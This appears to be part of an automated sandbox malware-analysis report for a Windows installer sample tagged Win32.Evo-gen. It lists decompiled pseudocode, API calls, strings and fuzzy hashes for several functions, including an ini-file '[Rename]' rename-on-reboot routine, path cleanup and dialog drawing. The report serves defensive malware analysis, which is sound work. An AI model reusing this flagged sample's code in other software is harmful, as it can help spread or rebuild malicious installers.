                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                    • String ID: F
                                                    • API String ID: 941294808-1304234792
                                                    • Opcode ID: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
                                                    • Instruction ID: fbc3582f0be17511ef24b6208279bd62f68a22b1f89f17edcf88e24f0ff4dafb
                                                    • Opcode Fuzzy Hash: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
                                                    • Instruction Fuzzy Hash: 8E418A71800209AFCF058F95DE459AFBBB9FF44310F00842EF991AA1A0C738EA55DFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00405F41 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00405F41(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t13;
				long _t25;
				char* _t32;
				int _t38;
				void* _t39;
				intOrPtr* _t40;
				long _t43;
				WCHAR* _t45;
				void* _t47;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t54;

				_t39 = __ecx;
				lstrcpyW(0x426dc8, L"NUL");
				_t45 =  *(_t53 + 0x18);
				if(_t45 == 0) {
					L3:
					_t13 = GetShortPathNameW( *(_t53 + 0x1c), 0x4275c8, 0x400);
					if(_t13 != 0 && _t13 <= 0x400) {
						_t38 = wsprintfA(0x4269c8, "%ls=%ls\r\n", 0x426dc8, 0x4275c8);
						_t54 = _t53 + 0x10;
						E00406234(_t38, 0x400, 0x4275c8, 0x4275c8,  *((intOrPtr*)( *0x42a250 + 0x128)));
						_t13 = E00405DE7(0x4275c8, 0xc0000000, 4);
						_t49 = _t13;
						 *(_t54 + 0x18) = _t49;
						if(_t49 != 0xffffffff) {
							_t43 = GetFileSize(_t49, 0);
							_t6 = _t38 + 0xa; // 0xa
							_t47 = GlobalAlloc(0x40, _t43 + _t6);
							if(_t47 == 0 || E00405E6A(_t49, _t47, _t43) == 0) {
								L18:
								return CloseHandle(_t49);
							} else {
								if(E00405D4C(_t39, _t47, "[Rename]\r\n") != 0) {
									_t50 = E00405D4C(_t39, _t22 + 0xa, "\n[");
									if(_t50 == 0) {
										_t49 =  *(_t54 + 0x18);
										L16:
										_t25 = _t43;
										L17:
										E00405DA2(_t25 + _t47, 0x4269c8, _t38);
										SetFilePointer(_t49, 0, 0, 0);
										E00405E99(_t49, _t47, _t43 + _t38);
										GlobalFree(_t47);
										goto L18;
									}
									_t40 = _t47 + _t43;
									_t32 = _t40 + _t38;
									while(_t40 > _t50) {
										 *_t32 =  *_t40;
										_t32 = _t32 - 1;
										_t40 = _t40 - 1;
									}
									_t25 = _t50 - _t47 + 1;
									_t49 =  *(_t54 + 0x18);
									goto L17;
								}
								lstrcpyA(_t47 + _t43, "[Rename]\r\n");
								_t43 = _t43 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405DE7(_t45, 0, 1));
					_t13 = GetShortPathNameW(_t45, 0x426dc8, 0x400);
					if(_t13 != 0 && _t13 <= 0x400) {
						goto L3;
					}
				}
				return _t13;
			}



















                                                    0x00405f41
                                                    0x00405f50
                                                    0x00405f56
                                                    0x00405f67
                                                    0x00405f8f
                                                    0x00405f9a
                                                    0x00405f9e
                                                    0x00405fbe
                                                    0x00405fc5
                                                    0x00405fcf
                                                    0x00405fdc
                                                    0x00405fe1
                                                    0x00405fe6
                                                    0x00405fea
                                                    0x00405ff9
                                                    0x00405ffb
                                                    0x00406008
                                                    0x0040600c
                                                    0x004060a7
                                                    0x00000000
                                                    0x00406022
                                                    0x0040602f
                                                    0x00406053
                                                    0x00406057
                                                    0x00406076
                                                    0x0040607a
                                                    0x0040607a
                                                    0x0040607c
                                                    0x00406085
                                                    0x00406090
                                                    0x0040609b
                                                    0x004060a1
                                                    0x00000000
                                                    0x004060a1
                                                    0x00406059
                                                    0x0040605c
                                                    0x00406067
                                                    0x00406063
                                                    0x00406065
                                                    0x00406066
                                                    0x00406066
                                                    0x0040606e
                                                    0x00406070
                                                    0x00000000
                                                    0x00406070
                                                    0x0040603a
                                                    0x00406040
                                                    0x00000000
                                                    0x00406040
                                                    0x0040600c
                                                    0x00405fea
                                                    0x00405f69
                                                    0x00405f74
                                                    0x00405f7d
                                                    0x00405f81
                                                    0x00000000
                                                    0x00000000
                                                    0x00405f81
                                                    0x004060b2

                                                    APIs
                                                    • lstrcpyW.KERNEL32(00426DC8,NUL), ref: 00405F50
                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,004060D4,?,?), ref: 00405F74
                                                    • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00405F7D
                                                      • Part of subcall function 00405D4C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5C
                                                      • Part of subcall function 00405D4C: lstrlenA.KERNEL32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8E
                                                    • GetShortPathNameW.KERNEL32(004275C8,004275C8,00000400), ref: 00405F9A
                                                    • wsprintfA.USER32 ref: 00405FB8
                                                    • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 00405FF3
                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406002
                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040603A
                                                    • SetFilePointer.KERNEL32(0040A588,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A588,00000000,[Rename],00000000,00000000,00000000), ref: 00406090
                                                    • GlobalFree.KERNEL32(00000000), ref: 004060A1
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004060A8
                                                      • Part of subcall function 00405DE7: GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe,80000000,00000003), ref: 00405DEB
                                                      • Part of subcall function 00405DE7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                    • String ID: %ls=%ls$NUL$[Rename]
                                                    • API String ID: 222337774-899692902
                                                    • Opcode ID: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
                                                    • Instruction ID: 33b5be0cf5b447351be1faad876236776c79ee828f4547529858959512194336
                                                    • Opcode Fuzzy Hash: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
                                                    • Instruction Fuzzy Hash: 6F3126702407147FC220AB219D09F6B3A9CEF45798F16003BF942F62D2DA7CD8218ABD
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004064A6 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 91%
                                                    			E004064A6(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405C3D(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405BF3(L"*?|<>/\":", _t5))) == 0) {
							E00405DA2(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                    0x004064a8
                                                    0x004064b1
                                                    0x004064c8
                                                    0x004064c8
                                                    0x004064cf
                                                    0x004064db
                                                    0x004064db
                                                    0x004064de
                                                    0x004064e1
                                                    0x004064e6
                                                    0x004064e8
                                                    0x004064f1
                                                    0x004064f5
                                                    0x00406512
                                                    0x0040651a
                                                    0x0040651a
                                                    0x0040651f
                                                    0x00406521
                                                    0x00406524
                                                    0x00406529
                                                    0x0040652a
                                                    0x0040652e
                                                    0x0040652e
                                                    0x0040652f
                                                    0x00406536
                                                    0x00406538
                                                    0x0040653f
                                                    0x00000000
                                                    0x00000000
                                                    0x00406547
                                                    0x0040654d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040654d
                                                    0x00406552

                                                    APIs
                                                    • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75F23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406509
                                                    • CharNextW.USER32(?,?,?,00000000), ref: 00406518
                                                    • CharNextW.USER32(?,00000000,75F23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 0040651D
                                                    • CharPrevW.USER32(?,?,75F23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406530
                                                    Strings
                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004064A7
                                                    • *?|<>/":, xrefs: 004064F8
                                                    • "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe", xrefs: 004064A6
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Char$Next$Prev
                                                    • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                    • API String ID: 589700163-2602404471
                                                    • Opcode ID: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
                                                    • Instruction ID: 798f9d5398cbdb919d0ccd284a00eb8243013f3251525297edaf214bcc17b89f
                                                    • Opcode Fuzzy Hash: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
                                                    • Instruction Fuzzy Hash: 30110815801612A5D7307B149C40AB776E8EFA5764F52803FEC8A733C5E77C5CA286AD
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040433D Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0040433D(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                    0x0040434f
                                                    0x004043e3
                                                    0x00000000
                                                    0x004043e3
                                                    0x00404360
                                                    0x00404364
                                                    0x00000000
                                                    0x00000000
                                                    0x0040436a
                                                    0x00404373
                                                    0x00404376
                                                    0x00404376
                                                    0x0040437c
                                                    0x00404382
                                                    0x00404382
                                                    0x0040438e
                                                    0x00404394
                                                    0x0040439b
                                                    0x0040439e
                                                    0x004043a1
                                                    0x004043a3
                                                    0x004043a3
                                                    0x004043ab
                                                    0x004043b1
                                                    0x004043b1
                                                    0x004043bb
                                                    0x004043c0
                                                    0x004043c3
                                                    0x004043c8
                                                    0x004043cb
                                                    0x004043cb
                                                    0x004043db
                                                    0x004043db
                                                    0x00000000

                                                    APIs
                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0040435A
                                                    • GetSysColor.USER32(00000000), ref: 00404376
                                                    • SetTextColor.GDI32(?,00000000), ref: 00404382
                                                    • SetBkMode.GDI32(?,?), ref: 0040438E
                                                    • GetSysColor.USER32(?), ref: 004043A1
                                                    • SetBkColor.GDI32(?,?), ref: 004043B1
                                                    • DeleteObject.GDI32(?), ref: 004043CB
                                                    • CreateBrushIndirect.GDI32(?), ref: 004043D5
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                    • String ID:
                                                    • API String ID: 2320649405-0
                                                    • Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                    • Instruction ID: f1e38b434243e48c2b46a4a8fcf45a1f38fac15713e13bd475e5664ee3236b4b
                                                    • Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                    • Instruction Fuzzy Hash: F0215171600704ABCB219F68DD48B5BBBF8AF41714F04892DEDD5E26E0D778E904CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00405371 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00405371(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429224;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a2f4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E00406234(_t38, 0, 0x422708, 0x422708, _a4);
					}
					_t27 = lstrlenW(0x422708);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429208, 0x422708);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422708;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422708[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422708, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                                    0x00405377
                                                    0x00405381
                                                    0x00405386
                                                    0x0040538c
                                                    0x00405397
                                                    0x0040539a
                                                    0x0040539d
                                                    0x004053a3
                                                    0x004053a3
                                                    0x004053a9
                                                    0x004053b1
                                                    0x004053b4
                                                    0x004053d1
                                                    0x004053d5
                                                    0x004053de
                                                    0x004053de
                                                    0x004053e8
                                                    0x004053f1
                                                    0x004053fd
                                                    0x00405404
                                                    0x00405408
                                                    0x0040540b
                                                    0x0040541e
                                                    0x0040542c
                                                    0x0040542c
                                                    0x00405430
                                                    0x00405432
                                                    0x00405435
                                                    0x00000000
                                                    0x00405435
                                                    0x004053b6
                                                    0x004053be
                                                    0x004053c6
                                                    0x004053cc
                                                    0x00000000
                                                    0x004053cc
                                                    0x004053c6
                                                    0x004053b4
                                                    0x00405441

                                                    APIs
                                                    • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                    • lstrlenW.KERNEL32(00402EAD,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                    • lstrcatW.KERNEL32(00422708,00402EAD), ref: 004053CC
                                                    • SetWindowTextW.USER32(00422708,00422708), ref: 004053DE
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                    • String ID:
                                                    • API String ID: 2531174081-0
                                                    • Opcode ID: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
                                                    • Instruction ID: a3987805c55db6f4a015f8fdfae83c311b34e51693a8fcc51f5c24f156ed4de6
                                                    • Opcode Fuzzy Hash: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
                                                    • Instruction Fuzzy Hash: A3218C71900518BBCB119F95ED84ACFBFB8EF45350F50807AF904B62A0C3B98A91DF68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00402E33 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00402E33(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x418edc; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x418edc = 0;
					return _t15;
				}
				__eflags =  *0x418edc; // 0x0
				if(__eflags != 0) {
					return E00406628(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x42a24c;
				if(_t6 >  *0x42a24c) {
					__eflags =  *0x42a248;
					if( *0x42a248 == 0) {
						_t7 = CreateDialogParamW( *0x42a240, 0x6f, 0, E00402D98, 0);
						 *0x418edc = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x42a2f4 & 0x00000001;
					if(( *0x42a2f4 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00402E17());
						return E00405371(0,  &_v132);
					}
				}
				return _t6;
			}







                                                    0x00402e42
                                                    0x00402e44
                                                    0x00402e4b
                                                    0x00402e4e
                                                    0x00402e4e
                                                    0x00402e54
                                                    0x00000000
                                                    0x00402e54
                                                    0x00402e5c
                                                    0x00402e62
                                                    0x00000000
                                                    0x00402e65
                                                    0x00402e6c
                                                    0x00402e72
                                                    0x00402e78
                                                    0x00402e7a
                                                    0x00402e80
                                                    0x00402ebe
                                                    0x00402ec7
                                                    0x00000000
                                                    0x00402ecc
                                                    0x00402e82
                                                    0x00402e89
                                                    0x00402e9a
                                                    0x00000000
                                                    0x00402ea8
                                                    0x00402e89
                                                    0x00402ed4

                                                    APIs
                                                    • DestroyWindow.USER32(00000000,00000000), ref: 00402E4E
                                                    • GetTickCount.KERNEL32 ref: 00402E6C
                                                    • wsprintfW.USER32 ref: 00402E9A
                                                      • Part of subcall function 00405371: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                      • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                      • Part of subcall function 00405371: lstrcatW.KERNEL32(00422708,00402EAD), ref: 004053CC
                                                      • Part of subcall function 00405371: SetWindowTextW.USER32(00422708,00422708), ref: 004053DE
                                                      • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                      • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                      • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402D98,00000000), ref: 00402EBE
                                                    • ShowWindow.USER32(00000000,00000005), ref: 00402ECC
                                                      • Part of subcall function 00402E17: MulDiv.KERNEL32(00017A74,00000064,0001A4BD), ref: 00402E2C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                    • String ID: ... %d%%
                                                    • API String ID: 722711167-2449383134
                                                    • Opcode ID: 7ab4736549933f7d70d83e7d18d719c287e01965cee6ce59e825f2c0a875d467
                                                    • Instruction ID: 8dd11ec53df0ba6bdd92dbd1cf8f77c56262218af4b431f1c1abafb00f700e94
                                                    • Opcode Fuzzy Hash: 7ab4736549933f7d70d83e7d18d719c287e01965cee6ce59e825f2c0a875d467
                                                    • Instruction Fuzzy Hash: FB016570541614DBC7216B50EE0DA9B7B58AB00B45B14413FF941F12D1DBF844A58BEE
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00404C3B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00404C3B(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                    0x00404c49
                                                    0x00404c56
                                                    0x00404c5c
                                                    0x00404c9a
                                                    0x00404c9a
